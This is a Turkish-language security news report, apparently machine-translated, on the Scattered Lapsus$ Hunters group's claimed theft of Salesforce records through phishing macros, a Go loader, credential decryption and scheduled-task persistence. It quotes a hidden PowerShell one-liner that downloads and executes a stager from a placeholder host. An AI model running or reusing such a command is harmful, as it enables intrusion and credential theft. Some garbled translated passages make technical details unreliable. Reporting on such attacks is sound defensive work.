Daha önce yüksek profilli veri hırsızlıklarıyla ilişkilendirilen bir tehdit grubu olan dağınık Lapsus$ Avcıları, yakın zamanda dünya çapındaki Salesforce ortamlarından bir milyardan fazla kaydın çalınmasının sorumluluğunu üstlendi.
2025’in ortasında ortaya çıkan grup, bulut kimliklerindeki ve açığa çıkan API’lerdeki yanlış yapılandırmalardan yararlanma taktiklerini geliştirdi.
İlk raporlar, birden fazla Salesforce müşterisinin gece geç saatlerde müşteri ilişkileri yönetimi (CRM) örneklerine yönelik anormal sorgular gözlemlemesiyle ortaya çıktı; bu durum, otomatik bir çıkarma aracının varlığına işaret ediyordu.
Adli günlükler biriktikçe araştırmacılar, erişilen verilerin hacminin ve kapsamının önceki izinsiz girişleri çok aştığını fark etti.
Bu son kampanyada saldırganlar, ilk tutunma noktasını kazanmak için hedefli kimlik avı tuzakları ve kimlik bilgileri doldurmanın bir kombinasyonundan yararlandı.
.webp)
Kurbanlar, kötü amaçlı bir Office makrosu gönderen, zorunlu güvenlik güncellemelerini isteyen orijinal görünümlü e-postalar aldıklarını bildirdi.
Makro, yürütüldükten sonra hafif bir yükleyici kurmak için uzaktaki bir komut ve kontrol sunucusuna ulaştı.
Palo Alto Networks analistleri, bu yükleyicinin Go’da yazıldığını ve sadeleştirilmiş sembollerle derlendiğini, bu durumun tersine mühendisliği daha zorlu hale getirdiğini belirtti.
Yükleyici daha sonra API belirteçlerini doğruladı ve çok aşamalı bir veri toplama rutini başlattı.
Bu ihlalin etkisi, açığa çıkan kişisel verilerin ötesine uzanır; Tescilli satış stratejileri, satış hattı tahminleri ve hassas müşteri görüşmelerinin tümü tehdit altındadır.
Birçok kuruluş, kritik görev operasyonları için büyük ölçüde Salesforce’a güveniyor; bu da herhangi bir uzlaşmanın operasyonel kesintilere ve itibar kaybına yol açabileceği anlamına geliyor.
İlk tahminler, grubun saatte 500 gigabaytın üzerinde sürekli bir hızda veri çıkarmış olabileceğini ve tespit edilmekten kaçınmak için kayıtları şifreli kanallar aracılığıyla toplu olarak sızdırdığını gösteriyor.
Enfeksiyon Mekanizması
Enfeksiyon mekanizmasına daha yakından bakıldığında, gizlilik ve kalıcılığa stratejik bir vurgu yapıldığı ortaya çıkıyor.
İlk makro bırakıcı yürütüldükten sonra, aşağıdaki gibi tek satırlık bir PowerShell betiği aşamalandırıcısı başlatılır: –
powershell -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& {IEX ((New-Object Net.WebClient).DownloadString('https://cdn.example.com/stager.ps1'))}"Bu aşamalandırıcı, Go tabanlı yükleyicinin tamamını almadan önce korumalı alan göstergelerini kontrol eder. Yükleyici daha sonra Windows Kimlik Bilgileri Yöneticisi’nde saklanan kimlik bilgilerinin şifresini aşağıdakileri kullanarak çözer: CredRead API’ye sahiptir ve veri erişim gereksinimlerini karşılayan en düşük ayrıcalıklı hizmet hesabıyla Salesforce REST API’sinde kimlik doğrulaması yapar.
Kimlik doğrulaması yapıldıktan sonra kötü amaçlı yazılım, nesne şemalarını sıralar ve kayıtları almak ve toplu olarak toplamak için dinamik olarak SOQL sorguları oluşturur. Her parti bellekte arabelleğe alınır ve HTTPS üzerinden özel bir filtreleme uç noktasına iletilmeden önce ChaCha20 ile şifrelenir.
Kalıcılığı sağlamak için kötü amaçlı yazılım, adlı zamanlanmış bir görevi kaydeder. UpdaterSvc bu her iki saatte bir tetiklenir. Bu görev, yükleyici ikili dosyasının varlığını doğrular, değiştirilmişse yeniden indirir ve son başarılı kayıt kimliğinden çıkarmaya devam eder.
Grubun API hız sınırı kaçırma ve kimlik bilgileri toplama konusundaki titiz yaklaşımı, bulutta yerel ortamlara ilişkin gelişmiş anlayışın altını çiziyor.
Scattered Lapsus$ Hunters, gelişmiş sosyal mühendislik, özel araçlar ve dayanıklı kalıcılık taktiklerini birleştirerek, kurumsal Salesforce örneklerinden geniş ölçekte ödün verme konusunda müthiş bir yetenek sergiledi.
Daha Fazla Anında Güncelleme Almak için Bizi Google Haberler, LinkedIn ve X’te Takip Edin, CSN’yi Google’da Tercih Edilen Kaynak olarak ayarlayın.
